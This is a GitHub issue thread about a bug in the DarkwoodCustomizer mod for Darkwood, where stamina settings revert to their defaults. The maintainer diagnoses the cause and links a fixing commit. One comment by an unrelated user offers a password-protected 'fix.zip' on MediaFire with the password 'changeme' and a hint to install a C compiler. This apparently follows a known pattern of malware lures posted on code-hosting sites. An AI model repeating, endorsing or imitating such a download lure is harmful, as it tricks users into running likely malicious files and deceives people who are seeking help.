### ISSUE TITLE
[BUG] Stamina config reverts to default randomly 

### ISSUE THREAD

**Issue by Dakayo** [xamionex/DarkwoodCustomizer#9]
[Save before chapter 2.zip](https://github.com/user-attachments/files/17177430/Save.before.chapter.2.zip)

Sometimes, when I load a game or progress to chapter 2, max stamina reverts back to default, as well as stamina regen values and intervals  

- Mod: 1.2.8 *experimental release*
- Game: 1.4.2

**Comment by SagarChandra07** [comment]
I think this will help you.
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme

you may need to install the c compiler

**Comment by xamionex** [comment]
Thanks for a save, I'll check it out when I get to it

**Comment by Dakayo** [comment]
> Thanks for a save, I'll check it out when I get to it

what was the password?

**Comment by xamionex** [comment]
Finally getting around to this, can you also give me your Player.cfg

**Comment by xamionex** [comment]
Seems to not be needed, I've experienced the issue and I'm thinking it's because the player character gets unloaded, my code is made to only set values once so I don't hog Player.Update() for my mod, I'll see how I can get around this

**Comment by xamionex** [comment]
Fixed in 1b867beb3e76abeedcac1163dc91ea428dff77ad
